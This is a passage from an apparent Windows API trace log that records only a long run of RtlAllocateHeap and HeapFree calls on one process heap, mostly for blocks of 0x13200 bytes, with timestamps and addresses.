(HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x27e7a40 [0229.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x27fac50 [0229.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x280de60 [0229.132] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2821070 [0229.133] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2834280 [0229.133] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2847490 [0229.134] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x285a6a0 [0229.134] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x286d8b0 [0229.134] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2880ac0 [0229.135] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2893cd0 [0229.135] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x28a6ee0 [0229.136] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x28ba0f0 [0229.136] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x28cd300 [0229.136] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x28e0510 [0229.137] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x698) returned 0x4f8910 [0229.137] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x50c5f0 | out: hHeap=0x4e0000) returned 1 [0229.137] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x28f3720 [0229.137] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2906930 [0229.138] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2919b40 [0229.138] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x292cd50 [0229.138] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x293ff60 [0229.138] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2953170 [0229.139] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2966380 [0229.139] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2979590 [0229.139] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x298c7a0 [0229.140] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x299f9b0 [0229.140] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x29b2bc0 [0229.140] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x29c5dd0 [0229.141] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x29d8fe0 [0229.141] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x29ec1f0 [0229.142] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x29ff400 [0229.142] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2a12610 [0229.143] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2a25820 [0229.143] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2a38a30 [0229.144] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2a4bc40 [0229.144] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2a5ee50 [0229.145] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2a72060 [0229.145] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2a85270 [0229.145] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2a98480 [0229.146] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2aab690 [0229.146] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2abe8a0 [0229.146] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2ad1ab0 [0229.146] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2ae4cc0 [0229.147] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2af7ed0 [0229.147] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2b0b0e0 [0229.148] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2b1e2f0 [0229.148] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2b31500 [0229.149] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2b44710 [0229.149] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2b57920 [0229.149] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2b6ab30 [0229.150] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2b7dd40 [0229.150] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2b90f50 [0229.150] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2ba4160 [0229.151] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2bb7370 [0229.151] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2bca580 [0229.152] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2bdd790 [0229.152] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2bf09a0 [0229.153] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2c03bb0 [0229.153] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2c16dc0 [0229.154] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2c29fd0 [0229.154] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2c3d1e0 [0229.155] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2c503f0 [0229.155] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2c63600 [0229.156] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2c76810 [0229.156] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2c89a20 [0229.156] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2c9cc30 [0229.156] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2cafe40 [0229.157] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2cc3050 [0229.157] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2cd6260 [0229.157] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2ce9470 [0229.158] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2cfc680 [0229.158] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2d0f890 [0229.159] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2d22aa0 [0229.159] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2d35cb0 [0229.469] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2d48ec0 [0229.469] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2d5c0d0 [0229.469] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2d6f2e0 [0229.470] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2d824f0 [0229.470] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2d95700 [0229.471] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2da8910 [0229.471] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2dd0080 [0229.472] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2de3290 [0229.473] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2df64a0 [0229.473] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2e096b0 [0229.473] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2e1c8c0 [0229.474] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2e2fad0 [0229.474] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x9e0) returned 0x50c5f0 [0229.474] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8910 | out: hHeap=0x4e0000) returned 1 [0229.474] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2e42ce0 [0229.475] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2e55ef0 [0229.475] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2e69100 [0229.475] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2e7c310 [0229.476] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2e8f520 [0229.476] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2ea2730 [0229.476] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2eb5940 [0229.477] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2ec8b50 [0229.477] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2edbd60 [0229.477] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2eeef70 [0229.478] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2f02180 [0229.478] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2f15390 [0229.479] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2f285a0 [0229.479] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2f3b7b0 [0229.479] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13200) returned 0x2f4e9c0 [0229.743] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x50c5f0 | out: hHeap=0x4e0000) returned 1 [0240.687] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x517480 | out: hHeap=0x4e0000) returned 1 [0240.687] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x537280 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x54a490 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x55d6a0 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x5708b0 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x583ac0 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x596cd0 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x5a9ee0 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x5bd0f0 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1e00080 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1e13290 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1e264a0 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1e396b0 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1e4c8c0 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1e5fad0 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1e72ce0 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1e85ef0 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1e99100 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1eac310 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1ebf520 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1ed2730 | out: hHeap=0x4e0000) returned 1 [0240.688] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1fd0080 | out: hHeap=0x4e0000) returned 1 [0240.689] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1fe3290 | out: hHeap=0x4e0000) returned 1 [0240.689] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x1ff64a0 | out: hHeap=0x4e0000) returned 1 [0240.689] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x20096b0 | out: hHeap=0x4e0000) returned 1 [0240.689] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x201c8c0 | out: hHeap=0x4e0000) returned 1 [0240.706] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x202fad0 | out: hHeap=0x4e0000) returned 1 [0240.708] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2042ce0 | out: hHeap=0x4e0000) returned 1 [0240.708] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2055ef0 | out: hHeap=0x4e0000) returned 1 [0240.708] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2069100 | out: hHeap=0x4e0000) returned 1 [0240.708] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x207c310 | out: hHeap=0x4e0000) returned 1 [0240.708] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x208f520 | out: hHeap=0x4e0000) returned 1 [0240.708] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x20a2730 | out: hHeap=0x4e0000) returned 1 [0240.709] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x20b5940 | out: hHeap=0x4e0000) returned 1 [0240.709] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x20c8b50 | out: hHeap=0x4e0000) returned 1 [0240.714] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x20dbd60 | out: hHeap=0x4e0000) returned 1 [0240.714] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x20eef70 | out: hHeap=0x4e0000) returned 1 [0240.714] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2102180 | out: hHeap=0x4e0000) returned 1 [0240.714] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2115390 | out: hHeap=0x4e0000) returned 1 [0240.714] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x21285a0 | out: hHeap=0x4e0000) returned 1 [0240.715] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x213b7b0 | out: hHeap=0x4e0000) returned 1 [0240.715] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x214e9c0 | out: hHeap=0x4e0000) returned 1 [0240.715] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2161bd0 | out: hHeap=0x4e0000) returned 1 [0240.715] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2174de0 | out: hHeap=0x4e0000) returned 1 [0240.715] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2187ff0 | out: hHeap=0x4e0000) returned 1 [0240.715] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x219b200 | out: hHeap=0x4e0000) returned 1 [0240.715] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x21ae410 | out: hHeap=0x4e0000) returned 1 [0240.715] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x21d0080 | out: hHeap=0x4e0000) returned 1 [0240.715] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x21e3290 | out: hHeap=0x4e0000) returned 1 [0240.955] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x21f64a0 | out: hHeap=0x4e0000) returned 1 [0240.955] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x22096b0 | out: hHeap=0x4e0000) returned 1 [0240.955] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x221c8c0 | out: hHeap=0x4e0000) returned 1 [0240.955] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x222fad0 | out: hHeap=0x4e0000) returned 1 [0240.955] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2242ce0 | out: hHeap=0x4e0000) returned 1 [0240.955] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2255ef0 | out: hHeap=0x4e0000) returned 1 [0240.955] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2269100 | out: hHeap=0x4e0000) returned 1 [0240.955] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x227c310 | out: hHeap=0x4e0000) returned 1 [0240.955] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x228f520 | out: hHeap=0x4e0000) returned 1 [0240.955] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x22a2730 | out: hHeap=0x4e0000) returned 1 [0240.955] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x22b5940 | out: hHeap=0x4e0000) returned 1 [0240.955] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x22c8b50 | out: hHeap=0x4e0000) returned 1 [0240.961] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x22dbd60 | out: hHeap=0x4e0000) returned 1 [0240.961] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x22eef70 | out: hHeap=0x4e0000) returned 1 [0240.961] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2302180 | out: hHeap=0x4e0000) returned 1 [0240.961] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2315390 | out: hHeap=0x4e0000) returned 1 [0240.961] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x23285a0 | out: hHeap=0x4e0000) returned 1 [0240.961] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x233b7b0 | out: hHeap=0x4e0000) returned 1 [0240.961] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x234e9c0 | out: hHeap=0x4e0000) returned 1 [0240.961] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2361bd0 | out: hHeap=0x4e0000) returned 1 [0240.961] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2374de0 | out: hHeap=0x4e0000) returned 1 [0240.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2387ff0 | out: hHeap=0x4e0000) returned 1 [0240.966] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x239b200 | out: hHeap=0x4e0000) returned 1 [0240.968] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x23ae410 | out: hHeap=0x4e0000) returned 1 [0240.968] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x23c1620 | out: hHeap=0x4e0000) returned 1 [0240.968] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x23d4830 | out: hHeap=0x4e0000) returned 1 [0240.972] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x23e7a40 | out: hHeap=0x4e0000) returned 1 [0240.972] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x23fac50 | out: hHeap=0x4e0000) returned 1 [0240.972] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x240de60 | out: hHeap=0x4e0000) returned 1 [0240.972] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2421070 | out: hHeap=0x4e0000) returned 1 [0240.972] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2434280 | out: hHeap=0x4e0000) returned 1 [0240.972] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2447490 | out: hHeap=0x4e0000) returned 1 [0240.972] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x245a6a0 | out: hHeap=0x4e0000) returned 1 [0240.972] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x246d8b0 | out: hHeap=0x4e0000) returned 1 [0240.973] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2480ac0 | out: hHeap=0x4e0000) returned 1 [0240.976] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2493cd0 | out: hHeap=0x4e0000) returned 1 [0240.976] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x24a6ee0 | out: hHeap=0x4e0000) returned 1 [0240.977] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x24ba0f0 | out: hHeap=0x4e0000) returned 1 [0240.977] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x24cd300 | out: hHeap=0x4e0000) returned 1 [0240.977] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x24e0510 | out: hHeap=0x4e0000) returned 1 [0240.984] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x24f3720 | out: hHeap=0x4e0000) returned 1 [0240.984] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2506930 | out: hHeap=0x4e0000) returned 1 [0240.985] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2519b40 | out: hHeap=0x4e0000) returned 1 [0240.986] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x252cd50 | out: hHeap=0x4e0000) returned 1 [0240.986] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x253ff60 | out: hHeap=0x4e0000) returned 1 [0240.986] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2553170 | out: hHeap=0x4e0000) returned 1 [0240.986] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2566380 | out: hHeap=0x4e0000) returned 1 [0240.986] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2579590 | out: hHeap=0x4e0000) returned 1 [0240.986] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x258c7a0 | out: hHeap=0x4e0000) returned 1 [0240.986] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x259f9b0 | out: hHeap=0x4e0000) returned 1 [0240.986] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x25b2bc0 | out: hHeap=0x4e0000) returned 1 [0240.986] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x25d0080 | out: hHeap=0x4e0000) returned 1 [0240.986] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x25e3290 | out: hHeap=0x4e0000) returned 1 [0240.987] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x25f64a0 | out: hHeap=0x4e0000) returned 1 [0240.987] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x26096b0 | out: hHeap=0x4e0000) returned 1 [0240.987] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x261c8c0 | out: hHeap=0x4e0000) returned 1 [0240.987] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x262fad0 | out: hHeap=0x4e0000) returned 1 [0240.987] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2642ce0 | out: hHeap=0x4e0000) returned 1 [0240.987] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2655ef0 | out: hHeap=0x4e0000) returned 1 [0240.987] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2669100 | out: hHeap=0x4e0000) returned 1 [0240.987] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x267c310 | out: hHeap=0x4e0000) returned 1 [0241.197] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x268f520 | out: hHeap=0x4e0000) returned 1 [0241.199] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x26a2730 | out: hHeap=0x4e0000) returned 1 [0241.199] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x26b5940 | out: hHeap=0x4e0000) returned 1 [0241.199] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x26c8b50 | out: hHeap=0x4e0000) returned 1 [0241.203] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x26dbd60 | out: hHeap=0x4e0000) returned 1 [0241.203] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x26eef70 | out: hHeap=0x4e0000) returned 1 [0241.203] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2702180 | out: hHeap=0x4e0000) returned 1 [0241.203] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2715390 | out: hHeap=0x4e0000) returned 1 [0241.203] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x27285a0 | out: hHeap=0x4e0000) returned 1 [0241.203] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x273b7b0 | out: hHeap=0x4e0000) returned 1 [0241.203] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x274e9c0 | out: hHeap=0x4e0000) returned 1 [0241.203] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2761bd0 | out: hHeap=0x4e0000) returned 1 [0241.203] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2774de0 | out: hHeap=0x4e0000) returned 1 [0241.203] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2787ff0 | out: hHeap=0x4e0000) returned 1 [0241.203] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x279b200 | out: hHeap=0x4e0000) returned 1 [0241.203] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x27ae410 | out: hHeap=0x4e0000) returned 1 [0241.203] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x27c1620 | out: hHeap=0x4e0000) returned 1 [0241.203] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x27d4830 | out: hHeap=0x4e0000) returned 1 [0241.210] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x27e7a40 | out: hHeap=0x4e0000) returned 1 [0241.211] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x27fac50 | out: hHeap=0x4e0000) returned 1 [0241.211] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x280de60 | out: hHeap=0x4e0000) returned 1 [0241.211] 